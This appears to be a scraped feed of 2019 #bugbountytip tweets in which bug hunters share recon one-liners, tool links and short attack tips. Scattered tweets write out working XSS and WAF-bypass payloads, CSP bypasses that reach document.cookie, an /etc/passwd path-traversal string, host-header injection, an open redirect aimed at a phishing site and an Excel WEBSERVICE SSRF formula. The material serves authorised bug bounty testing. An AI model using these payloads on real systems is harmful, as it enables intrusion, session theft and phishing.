0 You know you can turn that SSRF finding into something with devastating impact right? The AWS metadata REST API can be used to steal credentials via SSRF. More information on my blog: https://t.co/2DgWQ2LJkp #infosec #bugbountytips #osint #redteam #aws #bugbountytip #ssrf #hack https://t.co/CCpKLNnF1m
Ashraf
@m0rph1n3e


2019-10-13 01:04:21
0 SPENDING HOURS TESTING MY TARGET FOR CLIENT SIDE VULNERABILITIES, I AM STUCK AT THIS POINT. ANY ADVICE? METHODOLOGY? #bugbounty #bugbountytip #bugbountytips #infosec #xss #ssti #rce #hackerone
Andri Wahyudi 📂
@andripwn


2019-10-12 22:03:00
1 admin live now #bugbounty #bugbountytip https://t.co/VEXedERrSN
Ammar Amer🇸🇾
@cry__pto


2019-10-12 19:33:37
1 automatic screenshot tools,used to take a screenshots to large list of targets to extract useful info like errors that may lead to vulnerabilities -1-EyeWitness: https://t.co/7kbFXmViog -2-HTTPScreenShot: https://t.co/93SafaL5kg -3-Gowitness: https://t.co/YW8bdd75MW #bugbountytip
Rohit Kumar (@rohitcoder)
@rohitcoder


2019-10-12 09:30:44
0 https://t.co/KGbg9IYk2W Bounty: $$$ Thanks to facebook and other programs they're helping me to carry out my startup with these funds. This BugBounty life really helped me alot. #BugBountyTip #BugBounty #Facebook #FacebookBugBounty #Hacker0x01 #EthicalHacking #Hacking
FS
@fsec__


2019-10-12 01:56:49
0 Terminal tips #bugbountytips #bugbountytip #bugbounty https://t.co/dMR3wWBW9c
hacks2learn
@hacks2learn


2019-10-12 00:48:14
0 #ProTip when dropping XSS payloads into a complex dynamic application use breadcrumbs to retrace your steps. I spent 60+ mins trying to find where my hidden pop-up came from... instead use tests like alert("Home->Settings->Profile->Background->Image->NAME_field") #bugbountytip
Garth Humphreys
@garthhumphreys


2019-10-11 20:59:04
0 Gained admin access! #BugBounty #bugbountytip #bugbounties #infosec #appsec #writeup https://t.co/tOKQkuzHax
kaustubh padwad
@s3curityb3ast


2019-10-11 20:46:37
0 One of the best part of @SynackRedTeam is there missions. I rarely got change to grab one. But they are quick they pays and knowledge is bonus from it #bugbounty #bugbountytip #synack https://t.co/kBptrSMaam
Mourad
@SecuAudit


2019-10-11 16:04:53
0 Livechat is the most vulnerable part of a website , you have 85% of chance to find an XSS or IDOR there , if your favorite Bug Bounty program have a livechat support start pentesting it. #bugbountytip #bugbountytips #BugBounty https://t.co/LSwH3IZwY4
Somdev Sangwan
@s0md3v


2019-10-11 12:44:42
1 I performed a little experiment on bug hunters and as it turns out, lot of them are....curious hackers. Tweet 1's statistics are for 12 minutes and Tweet 2's statistics are for 5 minutes. Dear marketers, if you add #bugbountytip, these people will even read food recipes. https://t.co/s6vSo7Yra2
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-11 10:09:48
0 Maximise Your Bug Bounty Tutorial 🤩 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/0gfcgW7uTM
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-11 10:06:48
0 Maximise Your Bug Bounty —- 🤑🤑🤑 Bug Bounty Tools — 🤩🤩 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/OgAsV7XrzP
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-11 09:13:57
1 And sometimes for (LFI) url?para=//..//..//..//..//..//..//..//..//etc//passwd// Works!! #bugbountytip #BugBounty #bugbountytips #bugbounty
Sudoka
@sudo_sudoka


2019-10-11 04:35:44
0 Today I learn that @binaryedgeio can find many more things than Shodan. I searched for Pulse Secure VPN and found many servers that Shodan not indexes. You should give it a try at https://t.co/AZ43zPOuOW #BugBounty #bugbountytip #infosec #ThreatIntel #recon https://t.co/R0yBjlP0Gz
Murdockz
@Murdockz_CEH


2019-10-11 03:20:28
0 5 hours = 2 Critical 1. Admin ATO 2. GraphQL API privilege escalation Take a step back and learn from your mistakes then come back harder. Writeups soon. #bugbounty #infosec #bugbountytip
Ashraf
@m0rph1n3e


2019-10-10 15:10:32
0 I'VE FOUND API, TOKENS, AND SECRET KEYS. HOW TO VALIDATE BEFORE WRITING A REPORT? I WISH SOMEONE ANSWER ME ASAP. #BugBounty #bugbountytip #bugbountytips #infosec #CyberSecurity #WAF #SSTi #RCE #XSS #DataLeakage
Vincent RATISKOL
@vratiskol


2019-10-10 14:26:18
0 To illustrate my previous post, Burp Session handling tracer showing session validation with macro before sending request @Burp_Suite #bugbountytip https://t.co/F90REmVw0J
Michele Romano
@Mik317_


2019-10-10 14:19:50
2 What endpoints do you control when you come across a WP/Ghost instance? I've found a really good one: /blog/_wpeprivate/config.json, what about you? #BugBounty #bugbountytip
Security Executions Code
@pwn0sec


2019-10-10 12:58:41
1 Android App Penetration Testing #1 https://t.co/mlqVodvKJp #bugbounty #android #app #vulnerability #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 12:45:07
0 Maximise Your Bug Bounty With this Google Dork -- / -- inurl:fisheye AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:https://t.co/lc63NzPGi5 inurl:crucible AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:http://github #BugBounty #BugBountyTip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-10 11:54:38
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 08:07:07
1 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/Yytl4wdZn9
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 08:06:46
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/RQMWrnQNek
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 08:06:27
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/OY9jiDUdDR
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-10 07:30:32
1 Simple Script for scanning ports of all grabbed subdomains using masscan for scan in $(cat <file-path>); do masscan -p1-65535 $(dig +short $scan|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1) --max-rate 1000 |& tee port_scan #BugBountyTips #bugbountytip #bugbounty
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-10 06:48:04
0 #BugBountyTip To discover domains deployed on Github for subdomain takeover. Go to https://t.co/oLL4MCjX1S and search for "There isn't a Github Pages site here" Googledork: intitle:"Site not found · GitHub Pages" intext:"There isn't a Github Pages site here"
Iamsaintmalik_
@saintmalik_


2019-10-09 20:30:16
0 Guys am getting this response while trying to load some xss scripts, any help on how I can bypass this @bugbountyforum @stokfredrik @s0md3v #bugbountytips #BugBounty #bugbountytip https://t.co/n3jWvvTt7e
m0z
@LooseSecurity


2019-10-09 19:02:07
3 A quick reminder that my bug bounty challenge site is still live with 2 challenges! The second of which is very advanced (encorporating a WAF). https://t.co/cNYQsVPQ3K #bugbountytips #bugbountytip #bugbounties #bugbountyprogreartip
Rémy Marot
@R_Marot


2019-10-09 19:01:00
0 Simple but useful tool if you only have an index file inside a .git directory (no luck :)) and want to have it human readable : https://t.co/QRHd7CbsYC #bugbountytip
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-09 18:58:38
0 One liner to import whole list of subdomains into Burp suite for automated scanning! cat <file-name> | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #bugbountytips #bugbounty #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-09 17:35:17
0 Free Antivirus Be Like —// Follow Us -- https://t.co/S9CwjVYiHO… #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/XRSvgxtOyT
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-09 17:34:35
2 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/S9CwjVYiHO… #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
Mourad
@SecuAudit


2019-10-09 15:36:58
0 if you find a Form where you need ( Email + Date of birth + Zip code) to login , try to remove Zip code and Date of birth and send the form . #bugbountytip #bugbountytips #BugBounty https://t.co/uVw71NPXLo
tololovejoi
@tolo7010


2019-10-09 13:43:58
0 Question: Can i know how old are you sir? Please answer me Answer: (Please see my replies below): #bugbounty #bugbountytips #bugbountytip
kassih mouhssine
@KassihMouhssine


2019-10-09 13:29:09
0 account takeover write up all what u need is the email of the victim #bugbountytips #bugbountytip #cybersecurite https://t.co/W1DzdvWjST
Sanketh Sharath
@sharathsanketh


2019-10-09 12:57:14
0 Thanks very much @PentesterLand for featuring my blog post/article in your newsletter this week! Was pleasantly surprised. Appreciate it :) This is a lot of motivation for a beginner like me. Cheers! #bugbounty #bugbountytips #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-09 12:47:35
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Mourad
@SecuAudit


2019-10-09 11:11:35
0 Pentesting is becoming Harder and Harder , When I started in 2013 things were different , Now you need to grow your Mindset more than your Skills to Survive and achieve a decent living standard from BugBounty . #bugbounty #bugbountytip #pentesting #hackerone https://t.co/envVq5Lu0Q
Ammar Amer🇸🇾
@cry__pto


2019-10-09 09:03:26
6 Sub-Domain Takeover Tools: -1-SubOver:https://t.co/uzQ2X1rQ2v -2-Subjack:https://t.co/FdytR89u1w -3-autoSubTakeover:https://t.co/TWHTicVKnI -4-tko-subs:https://t.co/Tawtj1NvWc -5-HostileSubBruteforcer:https://t.co/3ydVulWy8l -6-Aquatone:https://t.co/6oxb7sgOhJ #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-10-09 07:53:40
2 2 udemy courses about ethical hacking free for a limited time both are 50 hours of useful content + high quality videos.and you will get a certification when finished prove that you finished the course. https://t.co/3xMEpNFL7u https://t.co/oZvixlG4LL #bugbountytip #hacking
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-09 07:07:53
0 Just saw your video on automation for finding 3rd level domains @thecybermentor It was nice!, Can use subfinder instead with -recursive option will do the same right? subfinder -d <domain> -recursive -silent -t 200 -v -o <out-put-file> #bugbounty #bugbountytip
Hritik Sharma
@iamHritikSH


2019-10-09 05:56:22
0 Server parses the XML but the problem is parameter entities are not working and whenever I try to use normal entity the server responds that content is not valid for application/xml, any tips community? #bugbounty #bugbountytips #bugbountytip
Brodie Codie
@brodie_codie


2019-10-09 03:04:35
3 Mood After finding another Bug #hackers #netsec #bugbounty #hacking #redteam #OSINT #recon #offsec #CTF #pentest #bugbountytip #bugbountytips #BrodieCodie #Metasploit #infosec #infosecurity https://t.co/bqwQBo5GVj
m0z
@LooseSecurity


2019-10-08 20:49:41
3 When I started out on my #BugBounty journey a little over 2 years ago, I read all the vulnerabilities on this page (and attempted to make a vuln web app to test some of them): https://t.co/M8VmqRlt8I I hope it helps someone else start their journey. #bugbountytip #bugbountytips
baluz🔥
@haknfuk


2019-10-08 14:42:47
0 If u feel like quitting stop feeling it #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:48:22
0 #bugbountytip if you ever encounter a endpoint filtering ' try \' it may work sometimes :) #sqli
Khaled Mohamed
@xelkomy


2019-10-08 12:42:46
0 awesome machine #hackthebox @hackthebox_eu #bugbountytip https://t.co/RtbEq1u5Z9
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:15:05
0 Hackers Turn Own Features Against It 🔥💕 #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-08 10:23:58
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-07 16:46:27
0 Seriously don't waste your time on searching for crlf injections, today i scanned nearly 30000+ unique domains and guess how many crlf's i found 0. #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-07 07:17:36
1 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-10-07 06:06:27
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Sudoka
@sudo_sudoka


2019-10-07 04:50:48
0 Koha, the popular open source ILS, has Open Redirect at https://t.co/4FJZI7rSG7. Google Dork for inurl:/cgi-bin/koha/ Then send a request to victims like this: site[.]com/cgi-bin/koha/tracklinks.pl?uri=//phishing.site #bugbounty #bugbountytip #threatintel
Securisec 🚀
@securisec


2019-10-07 00:40:26
2 "RT RT LooseSecurity: Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/bVfEZ0Drd4 #bugbountytips #BugBounty #bugbountytip"
Abood Nour
@AboodNour


2019-10-06 23:35:12
1 Found a better way to search GitHub projects using their own search filters. https://t.co/JJ7sn2DjQj In my case: `filename:file.php libname in:path` increased returned unique results to > 1.2K instead of ~20 returned from similar Google dork #BugBountyTip #BugBounty
m0z
@LooseSecurity


2019-10-06 22:32:42
5 Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/NHrtVoOw04 #bugbountytips #BugBounty #bugbountytip
Katie Paxton-Fear
@InsiderPhD


2019-10-06 22:17:04
3 Coming this week: the first video in the 'Finding Your First Bug' series, we're going to look at Business Logic Errors, first we'll look at what they are, how to find them, examples of some real bugs and do a practical with Burp! #BugBounty #bugbountytips #bugbountytip https://t.co/KxOUGVSxR3
RHack
@Queseguridad


2019-10-06 19:38:39
0 Some payloads bypass XSS '"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> CloudFront 1%3C/script%3E%3Csvg/onload=prompt(document[`domain`])%3E Akamai <dETAILS/open/onToGgle=a=prompt,a(45) x> Inperva #Bugbounty #Bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-06 19:11:55
3 Findomain 0.5.0 is out! Now you can also send new subdomain alerts to @telegram! Check out the documentation for a detailed guide on how get it working! https://t.co/VKrEP3eY4d #subdomains #enumeration #monitoring #BugBounty #bugbountytip #reconnaissance #automation #webhooks
Joe Bradshaw
@SnakesNBradders


2019-10-06 17:01:47
0 Want to extend this to the bugbounty community as well for help. #bugbountytip https://t.co/eqYt3M5gFX
Ammar Amer🇸🇾
@cry__pto


2019-10-06 08:01:17
3 during a web pentesting operations when seeing a Registration page you should try register with an existing username, to see if you can enumerate users. this is what i saw on @PayPal you can automate the whole process and get a list of website users. #bugbountytip #hacking https://t.co/WOZYUy4ulH
baluz🔥
@haknfuk


2019-10-06 06:15:57
1 #bugbounty #bugbountytip a channel for coders https://t.co/9JRrkSX6Pe
John mash
@Techhelplistcom


2019-10-06 05:00:01
0 i have uploaded 38 new articles as a pdf files about different fields of hacking to my github repository . enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/fNomAuiIdC https://t.co/waACGyXyHC
Matt Palmer
@mattpalmer_au


2019-10-06 04:44:27
0 1. First Program: Indeed 2. Had difficulties: Google 3. Most used Platform: Bugcrowd and Google 4. Totally hate: 5. Most loved: Automation 6. For beginners: Read, read, read #bugbounty #bugbountytip #bugbountytips https://t.co/EevoSwrDA5
Ammar Amer🇸🇾
@cry__pto


2019-10-06 04:28:06
4 i have uploaded 38 new articles as a pdf files about different fields of hacking to my github repository . enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/q2layzVpKz https://t.co/52Utrc6IMy
Imran nissar
@Imrannissar3


2019-10-05 22:25:11
0 Unexpected behaviour regarding web cache deception attack. Using Account 1 the page is being cached for 1 min and i am able to see all the information in incognito/different browser but When i loggin from a different account the page is not being cached #bugbountytip #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-10-05 19:29:36
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
jub0bs
@jub0bs


2019-10-05 17:15:48
0 #BugBountyTip "[Blind SSRF] cannot be trivially exploited to retrieve sensitive data from back-end systems"... except when forged requests to an attacker-controlled server contain sensitive data (e.g. an API key in headers). Happened to me a few days ago. https://t.co/LTrqNqZ8zK
Nick (@hunt4p1zza)
@ngkogkos


2019-10-05 13:41:01
2 Custom wordlist for file/folder/param fuzzing: 1. Flag interesting requests w/ "WLIST" in Burp constantly 2. Sort requests w/ "WLIST" > HTTP History 3. Use CO2 plugin, send requests to CeWLer & Extract Words 4. Normalize wordlist to ASCII w/ IDE/bash #bugbounty #bugbountytip https://t.co/lazF02od9j
bugbountytip
@a_l_e_r_t_1_


2019-10-05 12:39:03
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Jinone
@jinonehk


2019-10-05 09:57:12
0 <script src="https://t.co/1UvE8Y0fOd)"></script> bypass csp https://t.co/Jt9xQeag4g #BugBounty #BugBountyTip #WAF https://t.co/nz2OYbKBGx
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:14:53
0 Silent omission of certificate hostname verification in LibreSSL and BoringSSL Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/A2EJ8bgNyP
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:13:13
0 Malware Analysis 101 - Sandboxing Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/TXX3kDeuhe
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:09:35
0 Pushing Left, Like a Boss: Table of Contents Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Xs9P4t11CR
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:08:16
0 Red Teamer’s Guide to Pulse Secure SSL VPN Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/7qf0K4KUKR
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:04:53
2 Download predictions details of ads plans of any business. Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/nj3z2KLprL
Nick (@hunt4p1zza)
@ngkogkos


2019-10-04 19:20:20
0 This is the bash function I use for #bugbounty on a target. Although I use checklists, enforcing organization via the filesystem forces me to do a good/clean job & serves as a 2nd checklist. Also, helps w/ being more efficient, as you can tailor cheatsheets/scripts. #bugbountytip https://t.co/B7gq2pvaZW
bugbountytip
@a_l_e_r_t_1_


2019-10-04 15:50:17
0 Chrome ❎ Firefox ✅ #Bugbountytip https://t.co/nB1NqVdEPK
Ammar Amer🇸🇾
@cry__pto


2019-10-04 13:37:36
2 The Multi-Tool Web Vulnerability Scanner. sometimes you may need to automate some work+ it may give you some ideas wget -O https://t.co/AVYJOtJVY1 https://t.co/eBwaz4GrYH && chmod +x https://t.co/AVYJOtJVY1 python https://t.co/AVYJOtJVY1 https://t.co/KdHhpMDaA0 #bugbountytip https://t.co/wMBgzbyvVx
Michele Romano
@Mik317_


2019-10-04 13:32:34
1 Bypassed a CSTI protection: {{alert(1)}} renders a <span> tag with value 1 ... JS not evaluated, but you can turn it in {{alert('<script>alert(1)</script>')}} and your day becomes a better day 😊 #bugbountytip
Shiva Kumawat
@ShivaKumawat88


2019-10-04 12:59:48
0 It ay be a bug at #amazon mobile app #AmazonRocketDeals #AmazonGreatIndianFestival #AmazonRiddler #JokerMovie #bugbountytip #techno Here is video link--- https://t.co/I16F6WSj85
Evan Custodio
@defparam


2019-10-04 12:18:43
0 If an app accepts XLSX to convert to PDF/HTML it may run the file through MS Excel to eval formulas/convert. Try testing =WEBSERVICE(https://t.co/VXyqysIsep) and see if XML/HTML is added to the form (insta-SSRF). No clue excel even had this function #bugbountytip #bugbountytips
Flawwan
@Flawwan


2019-10-04 10:29:30
0 New blog post: Abusing PHP strip tags to bypass modern WAF to exploit XSS. https://t.co/MXRTMOuoEV #BugBounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-04 09:41:07
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Khaled Mohamed
@xelkomy


2019-10-04 08:30:35
0 #xss #bugbountytip #xelkomy Reflected Xss in Ibm POC https://t.co/YOoDCKbYHe
Imran nissar
@Imrannissar3


2019-10-04 07:58:45
0 Password reset host header injection Host: https://t.co/cxR3o4EYIs Bypassed by Host:https://t.co/cxR3o4EYIs"><a href='https://t.co/wgqXnDuzXt> #bugbountytip #bugbounty @Hacker0x01 @Bugcrowd
Verneet
@err0rrrrr


2019-10-04 06:41:10
1 Bypass CSP with: <embed /: script allowscriptaccess = always src = javascript:alert(document.cookie); https://t.co/dIZsSFrPmX> Just bypassed a Taxi company CSP :p @LooseSecurity #bugbountytip #bugbounty #bugcrowd
Evan Custodio
@defparam


2019-10-04 00:06:57
0 @AldoTheCrott @NahamSec @Twitch HTML injection in a email callback where I could control the CC addr and parts of the body. #bugbountytip test adding HTML into email callbacks. If the email puts the email address in the body try adding HTML after a '+'-sign alias (e.g. foo+<B><BR>[email protected])
A hacker's life
@Unknownuser1806


2019-10-03 20:49:05
0 Open redirect payloads https://t.co/ObQYpkmvym #payload,#hacking, #bugbounty,#bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-03 20:08:23
0 Bug Bounty = Hardwork + Will Power + Dedication #bugbounty #bugbountytip #devsecops #devops #secops #cybersecurity #hacking https://t.co/o9uZTW5vDa
Fisher
@Regala_


2019-10-03 18:31:03
0 @rudra16t @zseano Are you learning? Are you improving? Are you a better hacker than what you were a year ago? You get imposter syndrome if you compare yourself to others. YOU are only one you should compare and compete with. #bugbountytip
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-10-03 15:39:29
0 #bugbountytips #bugbountytip Need help. Get good xss from cookie based xss. Any suggestion? Share your knowledge.
Masonhck357
@DanielM59720745


2019-10-03 14:56:24
0 #bugbountytip NEVER STOP DOING RECON: I ended up finding sensitive info on a subdomain that I found doing recon the second time around last week. I just found out that the subdomain is only used when they sell tickets for an event. They said that my timing was just perfect :)
intigriti
@intigriti


2019-10-03 14:18:30
9 Can't get CSRF with POST? Then GET it! Use 'change request method' in Burp Suite to check if the server also accepts GET requests. Thanks for the #BugBountyTip, @spaceraccoonsec! #HackWithIntigriti https://t.co/YVRPwZD6L0
bugbountytip
@a_l_e_r_t_1_


2019-10-03 08:05:53
1 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
bing0o
@hack1lab


2019-10-03 02:46:08
1 My new tool now on github, Web Technologies Detector, simple but useful for developers, penetration testers and bug hunters 😎 https://t.co/z5FF4P3v9j #bugbountytool #BugBountyTip #bing0o https://t.co/ewDkgbl1L4
bugbountytip
@a_l_e_r_t_1_


2019-10-02 21:04:44
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-02 17:14:40
9 CloudFront ~`XSS´ payload, shake dice. 🎲 <iframe srcdoc=<svg/o&#x6Eload=alert(1)>> #BugBounty #BugBountyTip #WAF #infosec
dedsec
@dedsec211


2019-10-02 16:05:42
0 used this website to get Latest bug bounty related tweets #bugbountytip https://t.co/rWZ5mUNUnp
baluz🔥
@haknfuk


2019-10-02 14:44:09
0 Google dorks recon #bugbounty #bugbountytip https://t.co/aWGbjpMjKS
Aziz Hakim
@hackerb0y_


2019-10-02 11:35:18
7 REST framework Admin Panel bypass and how I recon for this vulnerability 🤑🤑🤑🤑 https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup
Aziz Hakim
@hackerb0y_


2019-10-02 10:48:43
0 write-up: REST framework Admin Panel bypass and how I recon for this vulnerability https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup https://t.co/csw7FCpMLB
baluz🔥
@haknfuk


2019-10-02 02:15:40
0 stealing cookies even though there are http-only cookies https://t.co/ir0FsJkGkf #bugbounty #bugbountytip #xss
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-10-01 22:22:37
0 Post based Cors misconfiguration PoC #bugbountytips #bugbountytip https://t.co/0NQPWfxCLH
vict0ni
@vict0ni


2019-10-01 18:01:12
0 When testing for reflected XSS, ignore the "Accept Cookie" pop-up (don't dismiss it or accept it, just ignore it). The pop-up's code might reflect the URL in the source code #bugbountytip #bugbountytips #bugbounty
Sukhmeet Singh
@MadGuyyy


2019-10-01 15:08:49
0 #BugBountyTip If you don't want @Random_Robbie to appear in your Github search results, use this: -user:"random-robbie" "target.tld" thnx
bugbountytip
@a_l_e_r_t_1_


2019-10-01 12:01:20
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Fisher
@Regala_


2019-10-01 10:33:22
0 I'll be starting my podcast in the 28th of October. Who's excited? Comment below 👇 what you'd love to hear and tag whom you'd be interested to have as a guests 🥳 #bbp #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-01 02:14:40
0 Findomain 0.4.1 is out! It release is specially dedicated to @SlackHQ! An issue that prevent pushing data to Slack webhooks is fixed and text formatting has been improved. Please check out https://t.co/5CskcM1Wrv #subdomains #hacking #recon #bunbounty #bugbountytip #monitoring
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-09-30 22:44:41
0 I am not sure report or not Find post based CORS misconfiguration. I can exploit it and get uuid and some cookies. Problem is post request body sends logged in user cookies and uuid value. Without it i got only one of cookie value. #bugbountytips #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 18:56:37
0 #Linux #ThugLife 😎 #BugBounty #BugBountyTip Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt https://t.co/8Qn0GoBMmj
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 18:54:57
0 Bug Bounty Mafia !! 😎 #BugBounty #BugBountyTip Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt https://t.co/fVaTdy1Pz1
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-09-30 18:28:15
1 Try parammeter polution. Get array in output :) redacted\.com/something/?par1=aaa&par1=bbb Response: ["aaa", "bbb"] Got nothing better this :( No sqli No xss No ssti No error for :( #bugbountytips #bugbountytip
Youssef Lahouifi
@YLahouifi


2019-09-30 17:30:26
0 directory brute forcing hosts recursively in one line of code : cat alivehosts.txt | xargs -n1 -I{} bash -c "cat wordlist.txt | xargs -n1 -I[] curl -s -o /dev/null -w '%{http_code} {}/[]\n' {}/[]" ps: you can use -P option for parallel processing #reconnaissance #bugbountytip
Andri Wahyudi 🕊️ ‏
@andripwn


2019-09-30 14:53:59
0 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/oe5VBCcNOK #bugbounty #xss #bugbountytip #bugbountytips #hackerone
Andri Wahyudi 🕊️ ‏
@andripwn


2019-09-30 14:05:04
1 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/0cMQH7RvaS #BugBounty #bugbountytip #bugbountytips
Securisec 🚀
@securisec


2019-09-30 13:51:32
1 "RT RT Madrobot_: I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd Hacker0x01 Bugcrowd https://t.co/jEDTMNgs8B"
Manoj Kumar
@mkmaddyshock


2019-09-30 12:56:30
